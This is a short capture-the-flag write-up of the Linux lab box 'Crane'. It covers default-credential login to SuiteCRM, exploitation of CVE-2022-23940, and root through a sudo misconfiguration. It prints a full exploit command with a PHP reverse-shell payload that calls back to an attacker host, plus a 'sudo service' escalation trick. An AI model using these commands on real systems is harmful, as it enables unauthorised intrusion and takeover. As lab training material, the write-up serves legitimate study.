Crane

Source: Proving Grounds OS: Linux Community Rating: Easy

Enumeration & Reconnaissance

• I started with autorecon as usual, which exposed the following ports:

  • SSH (22)

  • HTTP (80)

  • 3306

  • 33060

Service Analysis

• I began with HTTP (80), which hosted a SuiteCRM site. I tried the default credentials (admin:admin) and, as easy as that, I was in! I browsed around for a bit and then checked for a CVE. I found CVE-2022-23940, which provides RCE. I downloaded the PoC, which required valid credentials, and we already had them.

SuiteCRM

Gaining Initial Access

• I started a listener and ran the PoC with the following command: python exploit.py -h http://192.168.197.146 -u admin -p admin --payload "php -r '$sock=fsockopen("192.168.45.201", 4444); exec("/bin/sh -i <&3 >&3 2>&3");'"

• This delivered a reverse shell.

Reverse Shell

Privilege Escalation

• I then uploaded linpeas, which exposed that I could run /usr/sbin/service as root without a password. Checking gtfobins for a suitable command, I ran: sudo service ../../bin/shand got a root shell.

sudo -l

root Access

Lessons Learned

• Default credentials can provide immediate access.

• Simple misconfigurations, such as a service executable running as root without a password, offer a straightforward path to privilege escalation.